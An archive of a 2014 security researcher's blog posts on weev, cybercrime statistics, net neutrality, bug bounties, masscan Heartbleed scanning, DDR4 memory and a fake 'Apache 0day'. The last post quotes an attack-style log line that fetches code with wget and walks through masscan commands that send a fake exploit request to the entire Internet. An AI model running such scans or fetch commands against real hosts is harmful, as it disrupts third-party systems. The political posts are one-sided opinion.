Sunday, September 14, 2014

Hacker "weev" has left the United States

Hacker Andrew "weev" Auernheimer, who was unjustly persecuted by the US government and recently freed after a year in jail when the courts agreed his constitutional rights had been violated, has now left the United States for a non-extradition country:




I wonder what that means. On one hand, he could go full black-hat and go on a hacking spree. Hacking doesn't require anything more than a cheap laptop and a dial-up/satellite connection, so it can be done from anywhere in the world.

On the other hand, he could also go full white-hat. There is lots of useful white-hat research that we don't do because of the chilling effect of government. For example, in our VNC research, we don't test default password logins for some equipment, because this can be interpreted as violating the CFAA. However, if 'weev' never intends on traveling to an extradition country, it's something he can do, and report the results to help us secure systems.

Thirdly, he can now freely speak out against the United States. Again, while we theoretically have the right to "free speech", we see how those like Barret Brown are in jail purely because they spoke out against the police-state.




Thursday, September 11, 2014

Rebuttal to Volokh's CyberVor post

The "Volkh Conspiracy" is a wonderful libertarian law blog. Strangely, in the realm of cyber, Volokh ignores his libertarian roots and instead chooses authoritarian commentators, like NSA lawyer Stewart Baker or former prosecutor Marcus Christian. I suspect Volokh is insecure about his (lack of) cyber-knowledge, and therefore defers to these "experts" even when it goes against his libertarian instincts.

The latest example is a post by Marcus Christian about the CyberVor network -- a network that stole 4.5 billion credentials, including 1.2 billion passwords. The data cited in support of its authoritarianism has little value.

A "billion" credentials sounds like a lot, but in reality, few of those credentials are valid. In a separate incident yesterday, 5 million Gmail passwords were dumped to the Internet. Google analyzed the passwords and found only 2% were valid, and that automated defenses would likely have blocked exploitation of most of them. Certainly, 100,000 valid passwords is a large number, but it's not the headline 5 million number.

That's the norm in cyber. Authoritarian types who want to sell you something can easily quote outrageous headline numbers, and while others can recognize the data are hyped, few have the technical expertise to adequately rebut them. I speak at hacker conferences on the topic of password hacking [1] [2]; I can assure you those headline numbers are grossly inflated. They may be true after a fashion, but they do no imply what you think they do.

That blog post also cites a study by CSIS/McAfee claiming the economic cost of cybercrime is $475 billion per year. This number is similarly inflated, between 10 to 100 times.

We know the sources of income for hackers, such as credit card fraud, ransomware, and DDoS extortion. Of these, credit card fraud is by far the leading source of income. According to a July 2014 study by the US DoJ and FTC, all credit card fraud world-wide amounts to $5.55 billion per year. Since we know that less than half of this is due to hackers, and that credit card fraud is more than half of what hackers earn, this sets the upper limit on hacker income -- about 1% of what CSIS/McAfee claim as the cost of cybercrime. Of course, the costs incurred by hackers can be much higher than their income, but knowing their income puts us in the right ballpark.

Where CSIS/McAfee get their eye-popping numbers is vague estimates about such things as "loss of reputation" and "intellectual property losses". These numbers are arbitrary, depending upon a wide range of assumptions. Since we have no idea where they get such numbers, we can't put much faith in them.

Some of what they do divulge about their methods is obviously flawed. For example, when discussing why some countries don't report cybercrime losses, they say:
that some countries are miraculously unaffected by cybercrime despite having no better defenses than countries with similar income levels that suffer higher loss—seems improbable
This is wrong for two enormous reasons.

I developed a popular tool for scanning the Internet, and use it often to scan everything. Among the things this has taught me is that countries vary enormously, both in the way they exploit the Internet and in their "defenses". Two neighboring countries with similar culture and economic development can nonetheless vary widely in their Internet usage. In my person experience, it is not improbable that two countries with similar income levels will suffer different losses.

The second reason the above statement is wrong is their view of "defenses", as if the level of defense (anti-virus, firewalls, intrusion prevention) has a bearing on rates of hacking. It doesn't. It's like cars: what matters most as to whether you die in an accident is how often you drive, how far, where, and how good a driver you are. What matters less are "defenses" like air bags and anti-lock brakes. That's why automobile death rates in America correlate with things like recessions, the weather, building of freeways, and cracking down on dunk drivers. What they don't correlate with are technological advances in "defenses" like air bags. These "defenses" aren't useless, of course, but drivers respond by driving more aggressively and paying less attention to the road. The same is true in cyber, technologies like intrusion prevention aren't a magic pill that ward off hackers, but a tool that allows increased risk taking and different tradeoffs when exploiting the Internet. What you get from better defenses is increased profits from the Internet, rather than decreased losses. I say this as the inventor of the "intrusion prevention system", a popular cyber-defense that is now a $2 billion/year industry.

That McAfee and CSIS see "defenses" the wrong way reflects the fact that McAfee wants to sell "defensive" products, and CSIS wants to sell authoritarian legislation. Their report is not an honest assessment from experts, but an attempt to persuading people into buying what these organizations have to sell.

By the way, that posts mentions "SQL injection". It's a phrase you should pay attention to because it's been the most common way of hacking websites for over a decade. It's so easy teenagers with little skill can do SQL injection to hack websites. It's also easily preventable, just use a thing called "parameterized queries" instead of a thing called "string pasting". Yet, schools keep pumping out website designers that know nothing of SQL injection and who "paste strings" together. This leads to the intractable problem that if you hire a university graduate to do your website, they'll put SQL injection flaws in the code that your neighbor's kid will immediately hack. Companies like McAfee try to sell you defenses like "WAFs" that only partly defend against the problem. The solution isn't adding "defenses" like WAFs, but to change the code from "string pasting" to "parameterized queries" which does completely prevent the problem. That our industry thinks in terms of "adding defenses" from vendors like McAfee, instead of just fixing the problem, is why cybersecurity has become intractable in recent years.

Marcus Christian's post ends with the claim that "law enforcement agencies must assume broader roles and bear greater burdens", that "individual businesses cannot afford to face cybercriminals alone", and then paraphrases text of recently proposed cybersecurity legislation. If you are libertarian, you should oppose this legislation. It's a power grab, increasing your own danger from law enforcement, and doing nothing to lessen the danger from hackers. I'm an expert in cybersecurity who helps companies defend against hackers, yet I'm regularly threatened and investigated by law enforcement thugs. They don't understand what I do, it's all witchcraft to them, so they see me as part of the problem rather than the solution. Law enforcement already has too much power in cyberspace, it needs to be rolled back, not extended.


In conclusion, rather than an "analysis" as Eugene Volokh claims, this post from Marcus Christian was transparent lobbying for legislation, with the standard distortion of data that the word "lobbying" implies. Readers of that blog shouldn't treat it as anything more than that.

Wednesday, September 10, 2014

What they claim about NetNeutrality is a lie

The EFF and other activists are promoting NetNeutrality in response the to FCC's request for comment. What they tell you is a lie. I thought I’d write up the major problems with their arguments.


“Save NetNeutrality”


Proponents claim they are trying to “save” NetNeutrality and preserve the status quo. This is a bald-faced lie.

The truth is that NetNeutrality is not now, nor has it ever been, the law. Fast-lanes have always been the norm. Most of your network traffic goes through fast-lanes (“CDNs”), for example.

The NPRM (the FCC request for comments we are all talking about here) quite clearly says: "Today, there are no legally enforceable rules by which the Commission can stop broadband providers from limiting Internet openness".

NetNeutrality means a radical change, from the free-market Internet we’ve had for decades to a government regulated utility like electricity, water, and sewer. If you like how the Internet has been running so far, then you should oppose the radical change to NetNeutrality.


“NetNeutrality is technical”


Proponents claim there is something “technical” about NetNeutrality, that the more of a geek/nerd you are, the more likely you are to support it. They claim NetNeutrality supporters have some sort of technical authority on the issue. This is a lie.

The truth is that NetNeutrality is pure left-wing dogma. That’s why the organizations supporting it are all well-known left-wing organizations, like Greenpeace, Daily Kos, and the EFF. You don’t see right-wing or libertarian organizations on the list supporting today’s protest. In contrast, other issues like the "SOPA blackout" and protests against the NSA enjoy wide bi-partisan support among right-wing, libertarian, and left-wing groups.

Your support of NetNeutrality correlates with your general political beliefs, not with your technical skill. One of the inventors of TCP/IP is Vint Cerf who supports NetNeutrality – and a lot of other left-wing causes. Another inventor is Bob Kahn, who opposes NetNeutrality and supports libertarian causes.

NetNeutrality is a political slogan only. It has as much technical meaning has "Hope and Change". Ask 10 people what the phrase technically means and you'll get 13 answers.

The only case where NetNeutrality correlates with technical knowledge is among those geeks who manage networks – and it’s an inverse correlation (they oppose it). That’s because they want technologists and not politicians deciding how to route packets.


“Fast lanes will slow down the Internet”


Proponents claim that fast-lanes for some will mean slow-lanes for everyone else. The opposite is true – the Internet wouldn’t work without fast lanes, because they shunt high-volume traffic off expensive long-distance links.

The fundamental problem with the Internet is the “tragedy of the commons” where a lot of people freeload off the system. This discourages investment needed to speed things up. Charging people for fast-lanes fixes this problem – it charges those willing to pay for faster speeds in order to invest in making the Internet faster. Everyone benefits – those in the new fast-lane, and those whose slow-lanes become less congested.

This is proven by “content delivery networks” or “CDNs”, which are the most common form of fast lanes. (Proponents claim that CDNs aren’t the fast lanes they are talking about, but that too is a lie). Most of your network traffic doesn’t go across long-distance links to place like Silicon Valley. Instead, most of it goes to data centers in your local city to these CDNs. Companies like Apple and Facebook maintain their own CDNs, others like Akamai and Lightspeed charge customers the privilege to be hosted on their CDNs. CDNs are the very essence of fast lanes, and the Internet as we know it wouldn’t happen without them.


“Bad things will happen”


NetNeutrality proponents claim bad things will happen in the future. These are lies, made-up stories designed to frighten you. You know they are made-up stories because NetNeutrality has never been the law, and the scary scenarios haven’t come to pass.

The left-wingers may be right, and maybe the government does indeed need to step in and regulate the Internet like a utility. But, we should wait for problems that arise and fix them – not start regulating to prevent bad things that would never actually occur. It’s the regulation of unlikely scenarios that is most likely to kill innovation on the future Internet. Today, corporations innovate first and ask forgiveness later, which is a far better model than having to ask a government bureaucrat whether they are allowed to proceed – then proceeding anyway by bribing or lobbying the bureaucrats.


“Bad things have happened”


Proponents claim that a few bad things have already happened. This is a lie, because they are creating a one-sided description of events.

For example, a few years ago, Comcast filtered BitTorrent traffic in a clear violation of NetNeutrality ideals. This was simply because the network gets overloaded during peak hours (5pm to 9pm) and BitTorrent users don’t particularly care about peak hours. Thus, by slowing down BitTorrent during peak hours, Comcast improved the network for everyone without inconveniencing BitTorrent users. It was a win-win solution to the congestion problem.

NetNeutrality activists hated the solution. Their furor caused Comcast to change their policy, no longer filtering BitTorrent, but imposing a 250gig bandwidth cap on all their users instead. This was a lose-lose solution, both BitTorrent users and Comcasts normal customers hated the solution – but NetNeutrality activists accepted it.

NetNeutrality activists describe the problem as whether or not Comcast should filter BitTorrent, as if filtering/not-filtering where the only two choices. That's a one-sided description of the problem. Comcast has a peak-hour congestion problem. The choices are to filter BitTorrent, impose bandwidth caps, bill by amount downloaded, bill low-bandwidth customers in order subsidize high-bandwidth customers, cause all customers to suffer congestion, and so on. By giving a one-sided description of the problem, NetNeutrality activists make it look like Comcast was evil for choosing a bad solution to the problem, but in truth, all alternatives are bad.

A similar situation is the dispute between NetFlix and Comcast. NetFlix has been freeloading off the system, making the 90% of low-bandwidth customers subsidize the 10% who do streaming video. Comcast is trying to make those who do streaming to pay for the costs involved. They are doing so by making NetFlix use CDNs like all other heavy users of the network. Activists take a very narrow view of this, casting Comcast as the bad guy, but any technical analysis of the situation shows that NetFlix is the bad guy freeloading on the system, and Comcast is the good guy putting a stop to it.

Companies like Comcast must solve technical problems. NetNeutrality deliberately distorts the description of the problems in order to make corporations look evil. Comcast certainly has monopolies in big cities on broadband (above 10mbps) Internet and we should distrust them, but the above examples were decided on technical grounds, not on rent-seeking monopolist grounds.


Conclusion


I’m not trying to sway your opinion on NetNeutrality, though of course it’s quite clear I oppose it. Instead, I’m trying to prove that the activists protesting today are liars. NetNeutrality isn’t the status quo or the current law, it’s not being “saved”. NetNeutrality is pure left-wing politics, not technical, and activists have no special technical authority on the issue. Fast-lanes are how the Internet works, they don’t cause slow-lanes for everyone else. The activists stories of future doom are designed to scare you and aren’t realistic, and their stories of past problems are completely distorted.





Frankly, activists are dishonest with themselves, as shown in the following tweet. In their eyes, Comcast is evil and "all about profits" because they lobby against NetNeutrality, while NetFlix is arresponsible/good company because they support NetNeutrality. But of course, we all know that NetFlix is likewise "all about profits", and their support for NetNeutrality is purely because they will profit by it.





Thursday, September 04, 2014

Vuln bounties are now the norm

When you get sued for a cybersecurity breach (such as in the recent Home Depot case), one of the questions will be "did you follow industry norms?". Your opposition will hire expert witnesses like me to say "no, they didn't".

One of those norms you fail at is "Do you have a vuln bounty program?". These are programs that pay hackers to research and disclose vulnerabilities (bugs) in their products/services. Such bounty programs have proven their worth at companies like Google and Mozilla, and have spread through the industry. The experts in our industry agree: due-diligence in cybersecurity means that you give others an incentive to find and disclose vulnerabilities. Contrariwise, anti-diligence is threatening, suing, and prosecuting hackers for disclosing your vulnerabilities.

There are now two great bounty-as-a-service*** companies "HackerOne" and "BugCrowd" that will help you run such a program. I don't know how much it costs, but looking at their long customer lists, I assume it's not too much.

I point this out because a lot of Internet companies have either announced their own programs, or signed onto the above two services, such as the recent announcement by Twitter. All us experts think it's a great idea and that the tradeoffs are minor. I mean, a lot of us understand tradeoffs, such as why HTTPS is difficult for your website -- we don't see important tradeoffs for vuln bounties. It is now valid to describe this as a "norm" for cybersecurity.




By the way, I offer $100 in BitCoin for vulns in my tools that I publish on GitHub:
https://github.com/robertdavidgraham



*** Hacker1 isn't a "bounty-as-a-service" company but a "vuln coordination". However, all the high-profile customers they highlight offer bounties, so it comes out to much the same thing. They might not handle the bounties directly, but they are certainly helping the bounty process.




Update: One important tradeoff is that is that such bounty programs attract a lot of noise from idiots, such as "your website doesn't use SSL, now gimme my bounty" [from @beauwoods]. Therefore, even if you have no vulnerabilities, there is some cost to such programs. That's why BugCrowd and Hacker1 are useful: they can more efficiently sift through the noise than your own organization. However, this highlights a problem in your organization: if you don't have the expertise to filter through such noise (and many organizations don't), then you don't have the expertise to run a bug bounty program. However, this also means you aren't in a position to be trusted.

Update: Another cost [from @JardineSoftware] is that by encouraging people to test your site, you'll increase the number of false-positives on your IDS. It'll be harder now to distinguish testers from attackers. That's not a concern: the real issue is that you spend far too much time looking at inbound attacks already and not enough at successful outbound exfiltration of data. If encouraging testers doubles the number of IDS alerts, then that's a good thing not a bad thing.

Update: You want to learn about cybersecurity? Then just read what's in/out of scope for the Yahoo! bounty: https://hackerone.com/yahoo

Monday, August 25, 2014

Masscan does STARTTLS

Just a quick note: I've updated my port-scanner masscan to support STARTTLS, including Heartbleed checks. Thus, if you scan:

masscan 192.168.0.0/16 -p0-65535 --banners --heartbleed

...then it'll find not only all vulnerable SSL servers, but also vulnerable SMTP/POP3/IMAP4/FTP servers using STARTTLS.

The issue is that there are two ways unencrypted protocols can support SSL. One is to assign a new port number (like 443 instead of 80), establish the SSL connection first, then the normal protocol second within the encrypted tunnel. The second way is the method SMTP uses: it starts the normal unencrypted SMTP session, then issues the "STARTTLS" command to convert the connection to SSL, then continue with SMTP encrypted.

Here's what a scan will look like:

Banner on port 143/tcp on 198.51.100.42: [ssl] cipher:0x39 , imap.example.com  
Banner on port 143/tcp on 198.51.100.42: [vuln] SSL[heartbeat] SSL[HEARTBLEED] 
Banner on port 143/tcp on 198.51.100.42: [imap] * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN AUTH=LOGIN AUTH=DIGEST-MD5 AUTH=CRAM-MD5] Dovecot ready.\x0a* CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN AUTH=LOGIN AUTH=DIGEST-MD5 AUTH=CRAM-MD5\x0aa001 OK Capability completed.\x0aa002

Because of the --banners option, we see the normal IMAP4 banners. Because the banner advertises STARTTLS, masscan will attempt to execute that feature. The SSL banner shows the name of the system "imap.example.com", and the vulnerability banner shows that it has heartbeats enabled, and that the software is vulnerable to Heartbleed.

I suggest you run this on all your outward facing sites on all ports -p0-65535 to find lots of Heartbleed vulnerable services that your normal vulnerability scanner might've missed.

I've probably introduced a bug doing this, so please update your code and try this out, and notify me of any bugs.


Note: if you want to also grab the full certificate with the SSL connection, use the option --capture cert to dump the BASE64 X.509 certificates as part of the scan.

Friday, August 15, 2014

Grow up, you babies

When I came home crying to my mommy because somebody at school called me "grahamcracker", my mother told me to just say "sticks and stones may break my bones but names will never hurt me". This frustrated me as a kid, because I wanted my mommy to make it stop, but of course, it's good advice. It was the only good advice back then, and it's the only solution now to stop Internet trolls.

In its quest to ban free speech, this NYTimes article can't even get the definition of the word "troll" right. Here's the correct definition:
"somebody who tries to provoke an emotional reaction"
The way to stop trolls is to grow up and stop giving them that emotional reaction. That's going to be difficult, because we have a nation of whiners and babies who don't want to grow up, who instead want the nanny-state to stop mean people from saying mean things. This leads to a police-state, where the powerful exploit anti-trolling laws to crack down on free-speech.

That NYTimes article claims that trolling leads to incivility. The opposite is true. Incivility doesn't come from me calling you a jerk. Instead, incivility comes from your inability to ignore it. It's your emotional response that is the problem, and your desire to sic the police-state on me to make me stop.

Let's work together and make our society more civil, and get people to stop responding to trolls. Let's tell the whining babies to grow the fuck up, and just repeat "sticks and stones may break my bones but names will never hurt me".

Saturday, August 02, 2014

C10M: The coming DDR4 revolution

Computer memory has been based on the same DRAM technology since the 1970s. Recent developments have been versions of the DDR technology, DDR2, DDR2, and now DDR4. The capacity and transfer speed have been doubling every couple years according to Moore's Law, but the latency has been stuck at ~70 nanoseconds for decades. The recent DDR4 standard won't fix this latency, but will give us a lot more tools to mitigate its effects.


Latency is bad. If a thread needs data from main memory, it must stop and wait for around 1000 instructions before the data is returned from memory. CPU caches mitigate most of this latency by keeping a copy of frequently used data in local, high-speed memory. This allows the processor to continue at full speed without having to wait.

The problem with Internet scale is that it can't be cached. If you have 10 million concurrent connections, each requiring 10-kilobytes of data, you'll need 100-gigabytes of memory. However, processors have only 20-megabytes of cache -- 50 thousand times too small to cache everything. That means whenever a packet arrives, the memory associated with that packet will not be in cache. The CPU will have to stop and wait while the data is retrieved from memory.

There are some ways around this. Specialty network processors solve this by having 8 threads per CPU core (whereas Intel has only 2 or even 1 thread per core). At any point in time, 7 threads can be blocked waiting for data to arrive from main memory, while the 8th thread continues at full speed with data from the cache.

On Intel processors, we have only 2 threads per core. Instead, our primary strategy for solving this problem is prefetching: telling the CPU to read memory into the cache that we'll need in the future.

For these strategies to work, however, the CPU needs to be able to read memory in parallel. To understand this, we need to look into details about how DRAM works.

As you know, DRAM consists of a bunch of capacitors arranged in large arrays. To read memory, you first select a row, and then rid each bit a column at a time. The problem is that it takes a long time to open the row before a read can take place. Also, before reading another row, the current row much be closed, which takes even more time. Most of memory latency is the time that it takes to close the current row and open the next row we want to read.

In order to allow parallel memory access, a chip will split the memory arrays into multiple banks, currently 4 banks. This now allows memory requests in parallel. The CPU issues a command to memory to open a row on bank #1. While it's waiting for the results, it can also issue a command to open a different row on bank #3.

Thus, with 4 banks, and random memory accesses, we can often have 4 memory requests happening in parallel at any point in time. The actual reads must happen sequentially, but most of the time, we'll be reading from one bank while waiting for another bank to open a row.

There is another way to increase parallel access, using multiple sets or ranks of chips. You'll often see that in DIMMs, where sometimes only one side is populated with chips (one rank), but other times both sides are populated (two ranks). In high density server memory, they'll double the size of the DIMMs, putting two ranks on each side.

There is yet another way to increase parallel access, using multiple channels. These are completely separate subsystems: not only can there be multiple commands outstanding to open a row on a given bank/rank, they can be streaming data from the chips simultaneously too. Thus, adding channels adds both to the maximum throughput as well as to the number of outstanding transactions.

A typical low-end system will have two channels, two ranks, and four banks giving a total of eight requests outstanding at any point in time.

Given a single thread, that means a C10M program with a custom TCP/IP stack can do creative things with prefetch. It can pull eight packets at a time from the incoming queue, hash them all, then do a prefetch on each one's TCP connection data. It can then process each packet as normal, being assured that all the data is now going to be in the cache instead of waiting on memory.

The problem here is that low-end desktop processors have four-cores with two-threads each, or eight threads total. Since the memory only allows eight concurrent transactions, we have a budget of only a single outstanding transaction per core. Prefetching will still help a little here, because it parallel access only works when they are on different channels/ranks/banks. The more outstanding requests, the more the CPU can choose from to work in parallel.


Now, here's where DDR4 comes into play: it dramatically increases the number of outstanding requests. It increases the number of banks from the standard 4 to 16. It also increases ranks from 4 to 8. By itself, this is an 8 fold increase in outstanding commands.

But it goes even further. A hot new technology is stacked chips. You see that in devices like the Raspberry Pi, where the 512-megabyte DDR3 DRAM chip is stacked right on top of the ARM CPU, looking from the outside world as a single chip.

For DDR4, designers plan on up to eight stacked DRAM chips. They've added chip select bits to select which chip in the stack is being accessed. Thus, this gives us a 256-fold theoretical increase in the number of outstanding transactions.

Intel has announced their Haswell-E processors with 8 hyperthreaded cores (16 threads total). This chip has 4 channels of DDR4 memory. Even a low-end configuration with only 32-gigs of RAM will still give you 16 banks times 2 ranks times 4 channels, or 128 outstanding transactions for 16 threads, or 8 outstanding transactions per thread.

But that's only with unstacked, normal memory. Vendors are talking about stacked packages that will increase this even further -- though it may take a couple years for these to come down in price.

This means that whereas in the past, prefetch has made little difference to code that was already limited by the number of outstanding memory transactions, it can make a big difference in future code with DDR4 memory.

Conclusion

This post is about getting Internet scale out of desktop hardware. An important limitation for current systems is the number of outstanding memory transactions possible with existing DRAM technology. New DDR4 memory will dramatically increase the number of outstanding transactions. This means that techniques like prefetch, which had limited utility in the past, may become much more useful in the future.

That Apache 0day was troll

Last week, many people saw what they thought was an Apache 0day. They say logs with lots of suggestive strings that looked like this:

[28/Jul/2014:20:04:07 +0000] “GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0″ 301 178 “-” “chroot-apach0day-HIDDEN BINDSHELL-ESTAB” “-”
Somebody has come forward and taken credit for this, admitting it was troll.

This is sort of a personality test. Many of us immediately assumed this was a troll, but that's because we are apt to disbelieve any hype. Others saw this as some new attack, but that's because they are apt to see attacks out of innocuous traffic. If your organization panicked at this "0day attack", which I'm sure some did, then you failed this personality test.


I don't know what tool the troll used, but I assume it was masscan, because that'd be the easiest way to do it. To do this with masscan, get a Debian/Ubuntu VPS and do the following:

apt-get install libpcap-dev dos2unix
git clone https://github.com/robertdavidgraham/masscan
cd masscan
make
echo "GET /my0dayexploit.php?a=\x0acat+/etc/password HTTP/1.0" >header.txt
echo "Referer: http://troll.com" >>header.txt
echo "" >>header.txt
unix2dos header.txt
iptables -A INPUT -p tcp --destination-port 4321 -j DROP

bin/masscan 0.0.0.0/0 -p80 --banners --hello-file header.txt --source-port 4321 --rate 1500000

Depending on the rate your VPS can transmit, you'll cover the entire Internet in one to ten hours.

The response output from servers will be printed to the screen. You probably don't want that, so you should add the "-oX troll.xml" to save the responses to an XML file.

The above example uses "echo" to append lines of text to a file since HTTP is conveniently a text-based protocol. Its uses "unix2dos" to convert the line-feeds into the cr-lf combination that HTTP wants.

Masscan has it's own TCP/IP stack. Thus, on Linux, it can't establish a TCP connection, because when it tries, the existing TCP stacks sees something wrong and sends a RST to kill the connection. One way to prevent this is to configure a firewall rule to tell the built-in Linux TCP/IP stack to ignore the port that masscan uses. Another way is to tell masscan to use a --source-ip that isn't assigned to any existing machine on the network.

The rates at which you can transmit vary widely by hosting provider. In theory, you should get a rate of 1.5-million packets/second, and that's easily obtained in a lab on slow machines. Yet, in real hosting environments, things slow down, and I haven't been able to figure out why. In my experience, 300,000 is more of what you'd expect to get.